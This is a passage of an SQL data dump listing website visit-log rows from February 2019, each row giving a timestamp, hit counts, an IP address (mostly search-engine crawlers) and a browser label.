3,1550478733,1,1,0,0,'46.229.168.146','other'),(387484,1550479267,3,3,0,0,'91.196.178.94','chrome'),(387485,1550479359,1,1,0,0,'54.36.148.228','other'),(387486,1550479811,1,1,0,0,'69.12.72.169','chrome'),(387487,1550480010,1,1,0,0,'54.36.148.12','other'),(387488,1550480177,1,1,0,0,'46.229.168.152','other'),(387489,1550480264,1,1,0,0,'54.36.148.229','other'),(387490,1550480469,1,1,0,0,'46.229.168.144','other'),(387491,1550480515,1,1,0,0,'46.229.168.129','other'),(387492,1550480594,1,1,0,0,'54.36.148.127','other'),(387493,1550480747,1,1,0,0,'46.229.168.147','other'),(387494,1550480955,1,1,0,0,'46.229.168.139','other'),(387495,1550481201,2,2,0,0,'216.244.66.241','other'),(387496,1550481251,1,1,0,0,'37.53.80.217','firefox'),(387497,1550481792,1,1,0,0,'66.249.66.156','chrome'),(387498,1550482387,1,1,0,0,'46.229.168.148','other'),(387499,1550482410,1,1,0,0,'95.163.255.196','other'),(387500,1550482431,1,1,0,0,'95.163.255.93','other'),(387501,1550482749,1,1,0,0,'91.196.178.66','chrome'),(387502,1550483016,1,1,0,0,'66.249.66.154','chrome'),(387503,1550483397,1,1,0,0,'91.196.178.94','chrome'),(387504,1550483445,1,1,0,0,'180.76.15.15','other'),(387505,1550483667,2,2,0,0,'216.244.66.241','other'),(387506,1550483923,1,1,0,0,'212.26.144.226','chrome'),(387507,1550483946,1,1,0,0,'157.55.39.91','other'),(387508,1550483976,1,1,0,0,'37.53.89.22','chrome'),(387509,1550484086,1,1,0,0,'40.77.167.118','other'),(387510,1550484229,1,1,0,0,'54.36.149.88','other'),(387511,1550484412,1,1,0,0,'54.36.148.11','other'),(387512,1550484818,1,1,0,0,'91.196.178.102','chrome'),(387513,1550484932,2,2,0,0,'157.55.39.166','other'),(387514,1550485060,1,1,0,0,'77.111.244.249','chrome'),(387515,1550485069,1,1,0,0,'54.36.148.165','other'),(387516,1550485360,1,1,0,0,'157.55.39.91','other'),(387517,1550485444,1,1,0,0,'54.36.148.249','other'),(387518,1550485485,1,1,0,0,'54.36.149.21','other'),(387519,1550485527,1,1,0,0,'218.30.103.174','other'),(387520,1550485562,1,1,0,0,'91.196.178.179','chrome'),(387521,1550485567,1,1,0,0,'54.36.149.59','other'),(387522,1550485688,1,1,0,0,'66.249.66.42','chrome'),(387523,1550485749,1,1,0,0,'54.36.148.110','other'),(387524,1550485777,1,1,0,0,'8.29.198.27','other'),(387525,1550485826,1,1,0,0,'54.36.148.193','other'),(387526,1550485905,1,1,0,0,'54.36.148.56','other'),(387527,1550485959,1,1,0,0,'54.36.149.75','other'),(387528,1550485968,1,1,0,0,'91.196.178.72','firefox'),(387529,1550485977,1,1,0,0,'95.133.36.44','chrome'),(387530,1550486145,1,1,0,0,'66.249.66.152','chrome'),(387531,1550486278,1,1,0,0,'157.55.39.158','other'),(387532,1550486505,1,1,0,0,'91.196.178.169','chrome'),(387533,1550486607,1,1,0,0,'54.36.148.185','other'),(387534,1550486726,1,1,0,0,'54.36.149.77','other'),(387535,1550486797,1,1,0,0,'54.36.149.10','other'),(387536,1550486826,1,1,0,0,'95.132.28.6','firefox'),(387537,1550486827,1,1,0,0,'94.178.171.235','chrome'),(387538,1550486856,1,1,0,0,'216.244.66.241','other'),(387539,1550487116,1,1,0,0,'66.249.66.222','chrome'),(387540,1550487188,1,1,0,0,'157.55.39.166','other'),(387541,1550487218,1,1,0,0,'54.36.148.115','other'),(387542,1550487331,1,1,0,0,'54.36.149.12','other'),(387543,1550487338,1,1,0,0,'8.29.198.27','other'),(387544,1550487572,1,1,0,0,'54.36.148.155','other'),(387545,1550487738,1,1,0,0,'54.36.148.35','other'),(387546,1550487839,1,1,0,0,'46.229.168.132','other'),(387547,1550487964,1,1,0,0,'66.249.66.156','chrome'),(387548,1550488081,1,1,0,0,'77.111.246.139','chrome'),(387549,1550488237,1,1,0,0,'94.178.171.235','chrome'),(387550,1550488404,1,1,0,0,'54.36.148.102','other'),(387551,1550488871,1,1,0,0,'54.36.148.131','other'),(387552,1550488995,1,1,0,0,'91.196.178.162','chrome'),(387553,1550489036,1,1,0,0,'207.46.13.136','other'),(387554,1550489048,1,1,0,0,'46.229.168.138','other'),(387555,1550489511,2,2,0,0,'66.249.66.154','chrome'),(387556,1550489551,1,1,0,0,'54.36.149.82','other'),(387557,1550489569,1,1,0,0,'207.46.13.251','other'),(387558,1550489633,1,1,0,0,'54.36.148.189','other'),(387559,1550489693,1,1,0,0,'46.229.168.132','other'),(387560,1550489704,2,2,0,0,'216.244.66.241','other'),(387561,1550489774,1,1,0,0,'66.249.66.222','chrome'),(387562,1550489909,1,1,0,0,'46.229.168.136','other'),(387563,1550489958,1,1,0,0,'54.36.148.88','other'),(387564,1550490042,1,1,0,0,'94.178.171.235','chrome'),(387565,1550490143,1,1,0,0,'54.36.149.9','other'),(387566,1550490220,1,1,0,0,'54.36.149.54','other'),(387567,1550490289,1,1,0,0,'54.36.148.136','other'),(387568,1550490315,1,1,0,0,'54.36.148.143','other'),(387569,1550490570,1,1,0,0,'54.36.148.215','other'),(387570,1550490658,2,2,0,0,'66.249.66.152','chrome'),(387571,1550490728,1,1,0,0,'54.36.148.122','other'),(387572,1550490962,1,1,0,0,'54.36.148.247','other'),(387573,1550491161,1,1,0,0,'94.178.171.235','chrome'),(387575,1550491332,1,1,0,0,'91.196.178.162','chrome'),(387576,1550491509,1,1,0,0,'54.36.148.64','other'),(387577,1550491619,1,1,0,0,'66.249.66.156','chrome'),(387578,1550491709,1,1,0,0,'54.36.149.41','other'),(387579,1550491968,2,2,0,0,'216.244.66.241','other'),(387580,1550492452,1,1,0,0,'40.77.167.55','other'),(387581,1550492516,1,1,0,0,'176.105.210.220','chrome'),(387582,1550492865,1,1,0,0,'91.124.182.170','firefox'),(387583,1550493032,1,1,0,0,'66.249.66.156','chrome'),(387584,1550493061,1,1,0,0,'91.196.179.25','chrome'),(387585,1550493180,1,1,0,0,'207.46.13.136','other'),(387586,1550493260,1,1,0,0,'54.36.148.181','other'),(387587,1550493844,1,1,0,0,'54.36.149.54','other'),(387588,1550493957,1,1,0,0,'54.36.148.195','other'),(387589,1550494177,1,1,0,0,'54.36.149.66','other'),(387590,1550494208,1,1,0,0,'54.36.149.29','other'),(387591,1550494410,1,1,0,0,'54.36.148.182','other'),(387592,1550494456,1,1,0,0,'54.36.148.43','other'),(387593,1550494610,1,1,0,0,'66.249.66.218','chrome'),(387594,1550494626,1,1,0,0,'54.36.148.93','other'),(387595,1550494785,2,2,0,0,'216.244.66.241','other'),(387596,1550495004,1,1,0,0,'54.36.149.92','other'),(387597,1550495170,1,1,0,0,'66.249.66.152','chrome'),(387598,1550495445,2,2,0,0,'157.55.39.126','other'),(387599,1550495450,1,1,0,0,'157.55.39.120','other'),(387600,1550495455,5,5,0,0,'40.77.167.55','other'),(387601,1550495472,2,2,0,0,'157.55.39.253','other'),(387602,1550495694,1,1,0,0,'95.133.48.62','chrome'),(387603,1550495710,1,1,0,0,'66.249.66.156','chrome'),(387604,1550495840,2,2,0,0,'91.196.178.94','chrome'),(387605,1550495977,1,1,0,0,'66.249.66.40','chrome'),(387606,1550496000,2,2,0,0,'37.54.184.25','chrome'),(387607,1550496249,1,1,0,0,'5.45.207.19','other'),(387608,1550496319,1,1,0,0,'91.124.182.170','firefox'),(387609,1550496628,1,1,0,0,'8.29.198.26','other'),(387610,1550496742,1,1,0,0,'54.36.148.85','other'),(387611,1550496821,1,1,0,0,'178.154.244.11','other'),(387612,1550497337,1,1,0,0,'54.36.148.52','other'),(387613,1550497367,1,1,0,0,'54.36.148.184','other'),(387614,1550497380,1,1,0,0,'46.229.168.152','other'),(387615,1550497784,1,1,0,0,'54.36.149.101','other'),(387616,1550497869,1,1,0,0,'216.244.66.241','other'),(387617,1550497894,1,1,0,0,'95.158.3.62','chrome'),(387618,1550498118,1,1,0,0,'54.36.148.42','other'),(387619,1550498179,1,1,0,0,'8.29.198.25','other'),(387620,1550498385,2,2,0,0,'66.249.66.156','chrome'),(387621,1550498447,1,1,0,0,'66.249.66.152','chrome'),(387622,1550498523,1,1,0,0,'54.36.149.24','other'),(387623,1550499094,1,1,0,0,'54.36.148.36','other'),(387624,1550499505,1,1,0,0,'5.45.207.79','other'),(387625,1550499515,1,1,0,0,'66.249.66.222','chrome'),(387626,1550499523,1,1,0,0,'66.249.66.152','chrome'),(387627,1550499536,1,1,0,0,'54.36.148.130','other'),(387628,1550499663,1,1,0,0,'40.77.167.55','other'),(387629,1550499669,1,1,0,0,'54.36.149.21','other'),(387630,1550499922,1,1,0,0,'54.36.149.95','other'),(387631,1550500052,1,1,0,0,'207.46.13.71','other'),(387632,1550500321,1,1,0,0,'46.219.231.239','chrome'),(387633,1550500353,1,1,0,0,'54.36.149.89','other'),(387634,1550500454,1,1,0,0,'46.229.168.150','other'),(387635,1550500482,1,1,0,0,'216.244.66.241','other'),(387636,1550500564,1,1,0,0,'54.36.149.4','other'),(387637,1550500916,1,1,0,0,'54.36.148.92','other'),(387638,1550501030,1,1,0,0,'54.36.148.117','other'),(387639,1550501080,1,1,0,0,'54.36.148.43','other'),(387640,1550501187,1,1,0,0,'54.36.149.44','other'),(387641,1550501211,1,1,0,0,'54.36.148.97','other'),(387642,1550501391,1,1,0,0,'94.178.171.235','chrome'),(387643,1550501412,1,1,0,0,'54.36.148.190','other'),(387644,1550501438,2,2,0,0,'40.77.167.143','other'),(387645,1550501770,1,1,0,0,'54.36.149.18','other'),(387646,1550501773,1,1,0,0,'91.196.178.94','chrome'),(387647,1550501909,1,1,0,0,'54.36.148.136','other'),(387648,1550502316,1,1,0,0,'66.249.66.156','chrome'),(387649,1550502437,1,1,0,0,'54.36.148.196','other'),(387650,1550502602,1,1,0,0,'216.244.66.241','other'),(387651,1550502794,1,1,0,0,'54.36.148.125','other'),(387652,1550502868,2,2,0,0,'95.213.141.126','opera'),(387653,1550502930,1,1,0,0,'54.36.148.249','other'),(387654,1550503223,2,2,0,0,'66.249.66.156','chrome'),(387655,1550503691,3,3,0,0,'66.249.66.154','chrome'),(387656,1550503983,1,1,0,0,'54.36.148.232','other'),(387657,1550504085,1,1,0,0,'157.55.39.204','other'),(387658,1550504185,1,1,0,0,'54.36.148.150','other'),(387659,1550504548,1,1,0,0,'54.36.149.64','other'),(387660,1550504888,1,1,0,0,'40.77.167.143','other'),(387661,1550505048,2,2,0,0,'207.46.13.8','other'),(387662,1550505144,1,1,0,0,'91.201.171.42','chrome'),(387663,1550505194,1,1,0,0,'54.36.149.80','other'),(387664,1550505301,1,1,0,0,'91.196.178.179','chrome'),(387665,1550505307,1,1,0,0,'54.36.148.239','other'),(387666,1550505762,2,2,0,0,'66.249.66.154','chrome'),(387667,1550505811,1,1,0,0,'54.36.148.95','other'),(387668,1550506035,1,1,0,0,'66.249.66.156','chrome'),(387669,1550506745,1,1,0,0,'54.36.148.142','other'),(387670,1550506989,1,1,0,0,'54.36.148.41','other'),(387671,1550507251,1,1,0,0,'141.101.1.47','firefox'),(387672,1550507474,1,1,0,0,'54.36.148.147','other'),(387673,1550507483,1,1,0,0,'8.29.198.26','other'),(387674,1550507589,1,1,0,0,'54.36.148.242','other'),(387675,1550507805,1,0,1,0,'66.249.66.154',''),(387676,1550507883,1,1,0,0,'54.36.148.110','other'),(387677,1550508103,1,1,0,0,'54.36.148.250','other'),(387678,1550508526,1,1,0,0,'54.36.148.15','other'),(387679,1550508981,1,1,0,0,'216.244.66.241','other'),(387680,1550509035,1,1,0,0,'54.36.148.68','other'),(387681,1550509037,1,1,0,0,'54.36.149.23','other'),(387682,1550509041,1,1,0,0,'8.29.198.25','other'),(387683,1550509211,2,2,0,0,'66.249.66.156','chrome'),(387684,1550509332,1,1,0,0,'54.36.148.236','other'),(387685,1550509675,1,1,0,0,'54.36.148.130','other'),(387686,1550509682,3,3,0,0,'66.249.66.152','chrome'),(387687,1550509856,1,1,0,0,'54.36.148.83','other'),(387688,1550509895,1,1,0,0,'54.36.148.201','other'),(387689,1550510391,1,1,0,0,'54.36.149.93','other'),(387690,1550510408,2,2,0,0,'66.249.66.154','chrome'),(387691,1550510414,1,1,0,0,'87.250.224.65','other'),(387692,1550510423,1,1,0,0,'66.249.66.44','chrome'),(387693,1550510735,2,2,0,0,'66.249.66.152','chrome'),(387694,1550510782,1,1,0,0,'91.196.178.161','chrome'),(387695,1550510792,1,1,0,0,'46.211.110.69','chrome'),(387696,1550510843,1,1,0,0,'95.163.255.99','other'),(387697,1550510846,1,1,0,0,'95.163.255.96','other'),(387698,1550510879,1,1,0,0,'66.249.66.156','chrome'),(387699,1550511179,1,1,0,0,'54.36.148.149','other'),(387700,1550511294,1,1,0,0,'54.36.148.142','other'),(387701,1550511649,1,1,0,0,'46.229.168.129','other'),(387702,1550511689,1,1,0,0,'216.244.66.241','other'),(387703,1550511698,1,1,0,0,'54.36.148.14','other'),(387704,1550511836,1,1,0,0,'66.249.66.152','chrome'),(387705,1550512563,1,1,0,0,'54.36.148.76','other'),(387706,1550512638,1,1,0,0,'46.229.168.132','other'),(387707,1550512669,1,1,0,0,'157.55.39.204','other'),(387708,1550512758,1,1,0,0,'95.132.133.37','firefox'),(387709,1550512816,1,1,0,0,'54.36.148.19','other'),(387710,1550512911,1,1,0,0,'54.36.148.54','other'),(387711,1550513079,1,1,0,0,'54.36.148.38','other'),(387712,1550513477,1,1,0,0,'66.249.66.44','chrome'),(387713,1550513511,1,1,0,0,'66.249.66.40','chrome'),(387714,1550513592,1,1,0,0,'54.36.148.100','other'),(387715,1550513883,1,1,0,0,'54.36.148.155','other'),(387716,1550513884,1,1,0,0,'46.229.168.132','other'),(387717,1550513943,2,2,0,0,'207.46.13.8','other'),(387718,1550514577,1,1,0,0,'54.36.148.137','other'),(387719,1550514606,1,1,0,0,'54.36.148.170','other'),(387720,1550514953,1,1,0,0,'207.46.13.8','other'),(387721,1550515081,1,1,0,0,'54.36.148.106','other'),(387722,1550515134,1,1,0,0,'180.76.15.158','other'),(387723,1550515161,1,1,0,0,'54.36.148.34','other'),(387724,1550515187,2,2,0,0,'66.249.66.152','chrome'),(387725,1550515329,1,1,0,0,'157.55.39.204','other'),(387726,1550515507,1,1,0,0,'46.229.168.150','other'),(387727,1550515705,1,1,0,0,'54.36.148.42','other'),(387728,1550515936,1,1,0,0,'95.163.255.174','other'),(387729,1550515971,1,1,0,0,'54.36.148.220','other'),(387730,1550516406,1,1,0,0,'66.249.66.152','chrome'),(387731,1550516455,1,1,0,0,'178.154.244.11','other'),(387732,1550516537,2,2,0,0,'188.163.18.95','chrome'),(387733,1550516539,2,2,0,0,'66.249.66.156','chrome'),(387734,1550516750,1,1,0,0,'54.36.148.106','other'),(387735,1550516929,1,1,0,0,'54.36.148.62','other'),(387736,1550517233,1,1,0,0,'54.36.148.181','other'),(387737,1550517485,1,1,0,0,'157.55.39.204','other'),(387738,1550517683,4,4,0,0,'66.249.66.156','chrome'),(387739,1550517696,2,2,0,0,'66.249.66.154','chrome'),(387740,1550517731,2,2,0,0,'66.249.66.152','chrome'),(387741,1550517785,1,1,0,0,'54.36.148.197','other'),(387742,1550517912,1,1,0,0,'54.36.148.126','other'),(387743,1550518136,1,1,0,0,'54.36.148.229','other'),(387744,1550518183,1,1,0,0,'54.36.148.46','other'),(387745,1550518326,1,1,0,0,'8.29.198.27','other'),(387746,1550518538,1,1,0,0,'80.77.47.245','chrome'),(387747,1550518581,1,1,0,0,'54.36.148.246','other'),(387748,1550518913,1,1,0,0,'54.36.148.92','other'),(387749,1550519400,4,4,0,0,'216.244.66.241','other'),(387750,1550519806,1,1,0,0,'46.133.15.218','chrome'),(387751,1550519880,1,1,0,0,'8.29.198.26','other'),(387752,1550519973,2,1,1,0,'66.249.66.152',''),(387753,1550520036,1,1,0,0,'95.108.213.4','other'),(387754,1550520060,1,1,0,0,'95.132.133.37','firefox'),(387755,1550520196,1,1,0,0,'52.53.201.78','chrome'),(387756,1550520208,1,1,0,0,'66.249.66.154','chrome'),(387757,1550520267,1,1,0,0,'5.45.207.79','other'),(387758,1550520366,1,1,0,0,'54.36.148.105','other'),(387759,1550520590,1,1,0,0,'54.36.148.14','other'),(387760,1550520942,2,2,0,0,'157.55.39.204','other'),(387761,1550521337,1,1,0,0,'207.46.13.101','other'),(387762,1550521791,2,2,0,0,'176.101.219.175','other'),(387763,1550521812,1,1,0,0,'54.36.148.36','other'),(387764,1550521916,1,1,0,0,'207.46.13.252','other'),(387765,1550522160,2,2,0,0,'66.249.66.152','chrome'),(387766,1550522590,1,1,0,0,'54.36.148.160','other'),(387767,1550522689,1,1,0,0,'54.36.148.125','other'),(387768,1550522731,1,1,0,0,'46.229.168.151','other'),(387769,1550522963,1,1,0,0,'54.36.148.158','other'),(387770,1550523282,1,1,0,0,'54.36.148.206','other'),(387771,1550523309,1,1,0,0,'66.249.66.154','chrome'),(387772,1550523582,1,1,0,0,'157.55.39.120','other'),(387773,1550524168,1,1,0,0,'54.36.148.178','other'),(387774,1550524219,1,1,0,0,'54.36.149.104','other'),(387775,1550524517,1,1,0,0,'66.249.66.90','chrome'),(387776,1550524807,1,1,0,0,'54.36.148.159','other'),(387777,1550524914,1,1,0,0,'40.77.167.204','other'),(387778,1550524918,1,1,0,0,'157.55.39.120','other'),(387779,1550524975,1,1,0,0,'54.36.148.194','other'),(387780,1550525033,3,3,0,0,'66.249.66.92','chrome'),(387781,1550525086,2,2,0,0,'207.46.13.73','other'),(387782,1550525135,1,1,0,0,'54.36.148.18','other'),(387783,1550525354,1,1,0,0,'66.249.66.1','chrome'),(387784,1550525356,1,1,0,0,'216.244.66.241','other'),(387785,1550525394,1,1,0,0,'54.36.148.160','other'),(387786,1550525587,1,1,0,0,'54.36.148.234','other'),(387787,1550525798,1,1,0,0,'157.55.39.175','other'),(387788,1550525898,1,1,0,0,'66.249.66.91','chrome'),(387789,1550525994,1,1,0,0,'54.36.148.47','other'),(387790,1550526052,3,3,0,0,'66.249.66.90','chrome'),(387791,1550526275,1,1,0,0,'66.249.66.92','chrome'),(387792,1550526481,1,1,0,0,'54.36.149.33','other'),(387793,1550526959,1,1,0,0,'188.163.0.196','other'),(387794,1550527163,1,1,0,0,'216.244.66.241','other'),(387795,1550527707,1,1,0,0,'54.36.149.14','other'),(387796,1550527727,1,1,0,0,'93.74.188.199','other'),(387797,1550527760,1,1,0,0,'66.249.66.92','chrome'),(387798,1550528159,1,1,0,0,'5.45.207.79','other'),(387799,1550528491,1,1,0,0,'40.77.167.204','other'),(387800,1550528568,1,1,0,0,'54.36.148.12','other'),(387801,1550528946,1,1,0,0,'66.249.66.220','chrome'),(387802,1550528967,2,2,0,0,'157.55.39.158','other'),(387803,1550529171,1,1,0,0,'8.29.198.26','other'),(387804,1550529190,1,1,0,0,'66.249.66.154','chrome'),(387805,1550529420,1,1,0,0,'180.76.15.144','other'),(387806,1550529426,1,1,0,0,'54.36.148.205','other'),(387807,1550529532,1,1,0,0,'66.249.66.152','chrome'),(387808,1550529652,1,1,0,0,'40.77.167.204','other'),(387809,1550530190,1,1,0,0,'66.249.66.154','chrome'),(387810,1550530542,1,1,0,0,'54.36.149.23','other'),(387811,1550530716,1,1,0,0,'8.29.198.25','other'),(387812,1550530844,1,1,0,0,'54.36.148.92','other'),(387813,1550531157,1,1,0,0,'54.36.148.169','other'),(387814,1550531175,1,1,0,0,'54.36.149.29','other'),(387815,1550531178,1,1,0,0,'54.36.149.67','other'),(387816,1550531207,1,1,0,0,'46.229.168.144','other'),(387817,1550531437,1,1,0,0,'66.249.66.154','chrome'),(387818,1550531499,2,2,0,0,'66.249.66.42','chrome'),(387819,1550531607,1,1,0,0,'54.36.149.80','other'),(387820,1550531696,1,1,0,0,'54.36.148.236','other'),(387821,1550531783,1,1,0,0,'54.36.149.6','other'),(387822,1550531974,1,1,0,0,'157.55.39.253','other'),(387823,1550532004,1,1,0,0,'46.229.168.135','other'),(387824,1550532109,1,1,0,0,'157.55.39.249','other'),(387825,1550532132,1,1,0,0,'40.77.167.44','other'),(387826,1550532331,1,1,0,0,'54.36.149.72','other'),(387827,1550532512,1,1,0,0,'54.36.148.194','other'),(387828,1550532523,1,1,0,0,'54.36.149.24','other'),(387829,1550532573,1,1,0,0,'54.36.148.251','other'),(387830,1550532662,1,1,0,0,'54.36.149.36','other'),(387831,1550532739,1,1,0,0,'54.36.149.40','other'),(387832,1550532770,1,1,0,0,'54.36.148.17','other'),(387833,1550532771,1,1,0,0,'54.36.148.23','other'),(387834,1550532784,1,1,0,0,'66.249.66.156','chrome'),(387835,1550533138,1,1,0,0,'66.249.66.154','chrome'),(387836,1550533145,1,1,0,0,'66.249.66.152','chrome'),(387837,1550533233,1,1,0,0,'40.77.167.44','other'),(387838,1550533339,1,1,0,0,'157.55.39.253','other'),(387839,1550533837,1,1,0,0,'54.36.148.148','other'),(387840,1550534639,1,1,0,0,'54.36.148.63','other'),(387841,1550534709,2,2,0,0,'66.249.66.156','chrome'),(387842,1550534772,1,1,0,0,'54.36.149.7','other'),(387843,1550534842,1,1,0,0,'54.36.148.30','other'),(387844,1550534866,1,1,0,0,'178.154.244.11','other'),(387845,1550534983,1,1,0,0,'66.249.66.152','chrome'),(387846,1550535088,1,1,0,0,'66.249.66.154','chrome'),(387847,1550535113,1,1,0,0,'54.36.149.2','other'),(387848,1550535132,1,1,0,0,'54.36.149.32','other'),(387849,1550535143,1,1,0,0,'54.36.148.85','other'),(387850,1550535243,1,1,0,0,'54.36.148.23','other'),(387851,1550535385,1,1,0,0,'54.36.149.35','other'),(387852,1550535642,1,1,0,0,'176.110.134.2','chrome'),(387853,1550535658,1,1,0,0,'54.36.149.87','other'),(387854,1550535738,1,1,0,0,'207.46.13.114','other'),(387855,1550535939,2,2,0,0,'66.249.66.156','chrome'),(387856,1550536069,1,1,0,0,'46.229.168.152','other'),(387857,1550536625,1,1,0,0,'54.36.148.104','other'),(387858,1550537102,2,2,0,0,'40.77.167.32','other'),(387859,1550537555,1,1,0,0,'54.36.149.28','other'),(387860,1550537804,1,1,0,0,'54.36.148.21','other'),(387861,1550537939,1,1,0,0,'54.36.148.36','other'),(387862,1550538198,1,1,0,0,'40.77.167.32','other'),(387863,1550538322,1,1,0,0,'54.36.149.34','other'),(387864,1550538446,1,1,0,0,'54.36.148.26','other'),(387865,1550538551,1,1,0,0,'207.46.13.101','other'),(387866,1550538738,1,1,0,0,'46.229.168.147','other'),(387867,1550538778,1,1,0,0,'46.229.168.143','other'),(387868,1550538781,1,1,0,0,'207.46.13.114','other'),(387869,1550538863,1,1,0,0,'95.163.255.99','other'),(387870,1550538909,1,1,0,0,'216.244.66.241','other'),(387871,1550538985,1,1,0,0,'54.36.148.62','other'),(387872,1550539076,1,1,0,0,'54.36.148.177','other'),(387873,1550539253,1,1,0,0,'54.36.148.149','other'),(387874,1550539354,1,1,0,0,'54.36.148.232','other'),(387875,1550539539,1,1,0,0,'66.249.66.152','chrome'),(387876,1550539665,1,1,0,0,'54.36.149.7','other'),(387877,1550539698,1,1,0,0,'54.36.148.83','other'),(387878,1550540023,1,1,0,0,'8.29.198.27','other'),(387879,1550540063,1,1,0,0,'54.36.148.164','other'),(387880,1550540195,1,1,0,0,'46.229.168.149','other'),(387881,1550540294,1,1,0,0,'66.249.66.154','chrome'),(387882,1550540297,1,1,0,0,'54.36.148.208','other'),(387883,1550540952,1,1,0,0,'54.36.148.63','other'),(387884,1550541112,1,1,0,0,'40.77.167.85','other'),(387885,1550541316,1,1,0,0,'54.36.149.79','other'),(387886,1550541335,2,2,0,0,'40.77.167.82','other'),(387887,1550541386,1,1,0,0,'54.36.148.147','other'),(387888,1550541557,1,1,0,0,'8.29.198.25','other'),(387889,1550541619,1,1,0,0,'54.36.148.90','other'),(387890,1550541859,1,1,0,0,'46.229.168.129','other'),(387891,1550542051,1,1,0,0,'54.36.149.5','other'),(387892,1550542091,1,1,0,0,'66.249.66.154','chrome'),(387893,1550542520,1,1,0,0,'54.36.148.202','other'),(387894,1550543013,1,1,0,0,'40.77.167.86','other'),(387895,1550543280,1,1,0,0,'54.36.149.89','other'),(387896,1550543421,1,1,0,0,'54.36.149.35','other'),(387897,1550543480,2,2,0,0,'34.222.120.107','chrome'),(387898,1550543722,1,1,0,0,'46.229.168.149','other'),(387899,1550543734,1,1,0,0,'54.36.148.55','other'),(387900,1550543758,1,1,0,0,'46.229.168.153','other'),(387901,1550543850,1,1,0,0,'54.36.149.75','other'),(387902,1550544052,1,1,0,0,'54.36.149.103','other'),(387903,1550544489,1,1,0,0,'54.36.148.221','other'),(387904,1550544531,1,1,0,0,'54.36.149.41','other'),(387905,1550544553,1,1,0,0,'40.77.167.86','other'),(387906,1550544857,1,1,0,0,'54.36.148.228','other'),(387907,1550545007,1,1,0,0,'95.163.255.180','other'),(387908,1550545178,1,1,0,0,'54.36.148.91','other'),(387909,1550545603,1,1,0,0,'54.36.148.209','other'),(387910,1550545757,1,1,0,0,'66.249.66.92','chrome'),(387911,1550545937,1,1,0,0,'66.249.66.154','chrome'),(387912,1550546021,1,1,0,0,'54.36.149.50','other'),(387913,1550546255,1,1,0,0,'40.77.167.22','other'),(387914,1550546484,1,1,0,0,'46.229.168.146','other'),(387915,1550546576,1,1,0,0,'46.229.168.133','other'),(387916,1550546683,1,1,0,0,'54.36.148.135','other'),(387917,1550546776,1,1,0,0,'46.229.168.152','other'),(387918,1550547443,1,1,0,0,'91.196.178.93','chrome'),(387919,1550547770,1,1,0,0,'54.36.148.37','other'),(387920,1550547989,2,2,0,0,'66.249.66.156','chrome'),(387921,1550548400,1,1,0,0,'46.229.168.150','other'),(387922,1550548498,1,1,0,0,'40.77.167.86','other'),(387923,1550548810,1,1,0,0,'216.244.66.241','other'),(387924,1550548874,2,2,0,0,'157.55.39.205','other'),(387925,1550548902,1,1,0,0,'54.36.148.70','other'),(387926,1550549270,2,2,0,0,'66.249.66.154','chrome'),(387927,1550549558,1,1,0,0,'54.36.149.42','other'),(387928,1550549942,1,1,0,0,'54.36.149.56','other'),(387929,1550549980,1,1,0,0,'66.249.66.44','chrome'),(387930,1550550193,1,1,0,0,'95.163.255.92','other'),(387931,1550550336,1,1,0,0,'40.77.167.86','other'),(387932,1550550524,1,1,0,0,'54.36.149.104','other'),(387933,1550550597,1,1,0,0,'216.244.66.241','other'),(387934,1550550739,1,1,0,0,'54.36.148.63','other'),(387935,1550550805,2,2,0,0,'66.249.66.154','chrome'),(387936,1550550807,1,1,0,0,'95.163.255.97','other'),(387938,1550550868,1,1,0,0,'95.163.255.95','other'),(387939,1550550870,1,1,0,0,'8.29.198.27','other'),(387940,1550551024,1,1,0,0,'54.36.149.25','other'),(387941,1550551025,1,1,0,0,'188.32.170.16','msie'),(387942,1550551068,1,1,0,0,'54.36.148.51','other'),(387943,1550551203,1,1,0,0,'46.229.168.135','other'),(387944,1550551327,1,1,0,0,'95.163.255.158','other'),(387945,1550551360,1,1,0,0,'54.36.148.199','other'),(387946,1550551427,1,1,0,0,'54.36.148.240','other'),(387947,1550551537,1,1,0,0,'54.36.148.43','other'),(387948,1550551621,4,4,0,0,'216.244.66.241','other'),(387949,1550551721,1,1,0,0,'54.36.148.185','other'),(387950,1550551872,1,0,1,0,'66.249.66.156',''),(387951,1550551886,1,1,0,0,'54.36.148.123','other'),(387952,1550551976,1,1,0,0,'95.163.255.161','other'),(387953,1550552027,1,1,0,0,'54.36.149.74','other'),(387954,1550552262,1,1,0,0,'54.36.149.0','other'),(387955,1550552289,1,1,0,0,'54.36.148.196','other'),(387956,1550552394,1,1,0,0,'8.29.198.27','other'),(387957,1550552615,2,2,0,0,'46.229.168.144','other'),(387958,1550552799,1,1,0,0,'54.36.148.147','other'),(387959,1550553045,1,1,0,0,'54.36.148.88','other'),(387960,1550553465,1,1,0,0,'66.249.66.156','chrome'),(387961,1550553508,1,1,0,0,'54.36.148.204','other'),(387962,1550553956,1,1,0,0,'54.36.148.234','other'),(387963,1550554312,1,1,0,0,'54.36.148.198','other'),(387964,1550554341,5,5,0,0,'216.244.66.241','other'),(387965,1550554444,1,1,0,0,'54.36.148.211','other'),(387966,1550554602,1,1,0,0,'54.36.149.26','other'),(387967,1550554855,1,1,0,0,'66.249.66.156','chrome'),(387968,1550555091,1,1,0,0,'66.249.66.152','chrome'),(387969,1550555214,1,1,0,0,'54.36.149.107','other'),(387970,1550556160,1,1,0,0,'54.36.149.28','other'),(387971,1550556175,1,1,0,0,'54.36.148.232','other'),(387972,1550556251,1,1,0,0,'66.249.66.152','chrome'),(387973,1550556359,2,2,0,0,'46.229.168.139','other'),(387974,1550556619,1,1,0,0,'185.107.47.215','other'),(387975,1550556751,1,1,0,0,'95.163.255.180','other'),(387976,1550557095,1,1,0,0,'54.36.148.152','other'),(387977,1550557224,1,1,0,0,'95.163.255.178','other'),(387978,1550557509,1,1,0,0,'46.229.168.137','other'),(387979,1550558088,1,1,0,0,'54.36.148.20','other'),(387980,1550558231,1,1,0,0,'54.36.148.97','other'),(387981,1550558405,1,1,0,0,'66.249.66.156','chrome'),(387982,1550558485,1,1,0,0,'54.36.148.181','other'),(387983,1550558523,1,1,0,0,'212.26.144.226','chrome'),(387984,1550559362,1,1,0,0,'94.178.171.235','chrome'),(387985,1550559377,1,1,0,0,'207.46.13.96','other'),(387986,1550559785,1,1,0,0,'91.196.178.61','chrome'),(387987,1550559826,2,2,0,0,'40.77.167.15','other'),(387988,1550559861,1,1,0,0,'66.249.66.44','chrome'),(387989,1550559879,1,1,0,0,'216.244.66.241','other'),(387990,1550559928,1,1,0,0,'66.249.66.154','chrome'),(387991,1550559952,2,2,0,0,'95.132.55.135','chrome'),(387992,1550560092,1,1,0,0,'54.36.148.182','other'),(387993,1550560095,1,1,0,